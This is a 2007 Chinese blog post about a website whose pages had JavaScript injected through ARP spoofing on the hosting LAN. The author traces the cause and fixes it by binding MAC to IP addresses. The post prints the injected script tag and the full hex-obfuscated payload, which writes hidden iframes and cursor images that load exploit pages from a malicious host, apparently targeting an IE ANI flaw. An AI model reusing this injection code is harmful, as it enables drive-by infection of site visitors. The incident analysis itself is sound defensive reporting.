网站被黑的假象--ARP欺骗之页面中加入一段js


Posted in Javascript onMay 16, 2007

昨天晚上发现访问我的网站的时候网页代码html的前面多了一串js代码。刚开始以为网站被黑了,赶紧到服务器上查看所有文件是否带有这串js代码,搜索结果没有,而且服务器也没发现被入侵的痕迹。
<script src=http://fuck.ns2go.com/dir/index_pic/1.js></script>

于是只能从这段代码入手,我下载这个js开发发现是下面一段代码:

window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65\x6c\x6e"]("\x3c\x44\x49\x56 \x73\x74\x79\x6c\x65\x3d\"\x43\x55\x52\x53\x4f\x52\x3a \x75\x72\x6c\x28\'\x68\x74\x74\x70\x3a\/\/\x66\x75\x63\x6b\x2e\x6e\x73\x32\x67\x6f\x2e\x63\x6f\x6d\/\x64\x69\x72\/\x69\x6e\x64\x65\x78\x5f\x70\x69\x63\/\x31\x2e\x67\x69\x66\'\x29\"\x3e");  
window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65\x6c\x6e"]("\x3c\x44\x49\x56 \x73\x74\x79\x6c\x65\x3d\"\x43\x55\x52\x53\x4f\x52\x3a \x75\x72\x6c\x28\'\x68\x74\x74\x70\x3a\/\/\x66\x75\x63\x6b\x2e\x6e\x73\x32\x67\x6f\x2e\x63\x6f\x6d\/\x64\x69\x72\/\x69\x6e\x64\x65\x78\x5f\x70\x69\x63\/\x32\x2e\x67\x69\x66\'\x29\"\x3e\x3c\/\x44\x49\x56\x3e\x3c\/\x44\x49\x56\x3e");  
window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65\x6c\x6e"]("\x3c\x69\x66\x72\x61\x6d\x65 \x73\x72\x63\x3d\x68\x74\x74\x70\x3a\/\/\x66\x75\x63\x6b\x2e\x6e\x73\x32\x67\x6f\x2e\x63\x6f\x6d\/\x64\x69\x72\/\x69\x6e\x64\x65\x78\x5f\x70\x69\x63\/\x30\x36\x30\x31\x34\x2e\x68\x74\x6d \x77\x69\x64\x74\x68\x3d\x31 \x68\x65\x69\x67\x68\x74\x3d\x31\x3e\x3c\/\x69\x66\x72\x61\x6d\x65\x3e");  
window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65\x6c\x6e"]("\x3c\x69\x66\x72\x61\x6d\x65 \x73\x72\x63\x3d\x68\x74\x74\x70\x3a\/\/\x66\x75\x63\x6b\x2e\x6e\x73\x32\x67\x6f\x2e\x63\x6f\x6d\/\x64\x69\x72\/\x69\x6e\x64\x65\x78\x5f\x70\x69\x63\/\x74\x6a\x2e\x68\x74\x6d \x77\x69\x64\x74\x68\x3d\x30 \x68\x65\x69\x67\x68\x74\x3d\x30\x3e\x3c\/\x69\x66\x72\x61\x6d\x65\x3e") 

在google上搜索发现有人已经发现同样情况.http://0e2.net/post/676.html
看了这篇文章之后了解到不是服务器被黑了,而是服务器所在的机房内网有中木马病毒的主机在搞arp欺骗.
这些木马捕抓了我的服务器发送出来的报文之后,篡改了报文的内容,在html头加入了前面那段木马病毒代码.然后再转发给访问我网站的用户主机.这段木马是针对ie的ani漏洞的,微软用户的电脑要赶紧升级打补丁.
最后问题就在于如何让我的服务器防止被ARP欺骗.打电话到机房,技术人员让我们将mac和ip地址绑定,问题终于解决.
关于ARP欺骗相关知识:
http://zhidao.baidu.com/question/7980952.html?si=1
Javascript 相关文章推荐
JAVASCRIPT style 中visibility和display之间的区别
Jan 22 Javascript
Javascript insertAfter() 实现函数代码
Oct 12 Javascript
jquery图片放大功能简单实现
Aug 01 Javascript
JS实现静止元素自动移动示例
Apr 14 Javascript
5个JavaScript经典面试题
Oct 13 Javascript
jQuery实现的放大镜效果示例
Sep 13 Javascript
AngularJS 中使用Swiper制作滚动图不能滑动的解决方法
Nov 15 Javascript
详解使用vue-cli脚手架初始化Vue项目下的项目结构
Mar 08 Javascript
Vue中Quill富文本编辑器的使用教程
Sep 21 Javascript
弱类型语言javascript开发中的一些坑实例小结【变量、函数、数组、对象、作用域等】
Aug 07 Javascript
Vue项目打包部署到iis服务器的配置方法
Oct 14 Javascript
Vue+element-ui添加自定义右键菜单的方法示例
Dec 08 Vue.js
javascript操作文本框readOnly
May 15 #Javascript
静态页面下用javascript操作ACCESS数据库(读增改删)的代码
May 14 #Javascript
User Scripts: Video Download by User Scripts
May 14 #Javascript
javascript之卸载鼠标事件的代码
May 14 #Javascript
getElementById在任意一款浏览器中都可以用吗的疑问回复
May 13 #Javascript
JavaScript脚本语言在网页中的简单应用
May 13 #Javascript
编辑浪子版表单验证类
May 12 #Javascript
You might like
php+mysql事务rollback&amp;commit示例
2010/02/08 PHP
PHP获取php,mysql,apche的版本信息示例代码
2014/01/16 PHP
JavaScript中出现乱码的处理心得
2009/12/24 Javascript
一个简单的实现下拉框多选的插件可移植性比较好
2014/05/05 Javascript
理解js回收机制通俗易懂版
2016/02/29 Javascript
简单实现jQuery进度条轮播实例代码
2016/06/20 Javascript
JS 滚动事件window.onscroll与position:fixed写兼容IE6的回到顶部组件
2016/10/10 Javascript
基于Javascript实现文件实时加载进度的方法
2016/10/12 Javascript
jQuery Ztree行政地区树状展示(点击加载)
2016/11/09 Javascript
js数组去重的hash方法
2016/12/22 Javascript
javascript验证香港身份证的格式或真实性
2017/02/07 Javascript
详解node.js搭建代理服务器请求数据
2017/04/08 Javascript
vue路由切换之淡入淡出的简单实现
2019/10/31 Javascript
Js代码中的span拼接问题解决
2019/11/22 Javascript
Vue实现返回顶部按钮实例代码
2020/10/21 Javascript
JavaScript 生成唯一ID的几种方式
2021/02/19 Javascript
[01:41]DOTA2超级联赛专访YYF 称一辈子难忘TI2
2013/05/28 DOTA
在Python中操作时间之tzset()方法的使用教程
2015/05/22 Python
基于Python检测动态物体颜色过程解析
2019/12/04 Python
Python print不能立即打印的解决方式
2020/02/19 Python
django xadmin 管理器常用显示设置方式
2020/03/11 Python
Python lxml库的简单介绍及基本使用讲解
2020/12/22 Python
flask框架中的cookie和session使用
2021/01/31 Python
Html5实现移动端、PC端 刮刮卡效果
2016/06/30 HTML / CSS
如何进行Linux分区优化
2013/02/12 面试题
Linux的文件类型
2012/03/07 面试题
与UNIX有关的几个名词
2015/09/17 面试题
中学教师实习自我鉴定
2013/09/28 职场文书
社区维稳工作方案
2014/06/06 职场文书
暑期教师培训方案
2014/06/07 职场文书
辞职信的写法
2015/02/27 职场文书
2016庆祝国庆67周年宣传语
2015/11/25 职场文书
会计手工模拟做账心得体会
2016/01/22 职场文书
《水浒传》读后感3篇(范文)
2019/09/19 职场文书
Java界面编程实现界面跳转
2022/06/16 Java/Android
SpringBoot使用ip2region获取地理位置信息的方法
2022/06/21 Java/Android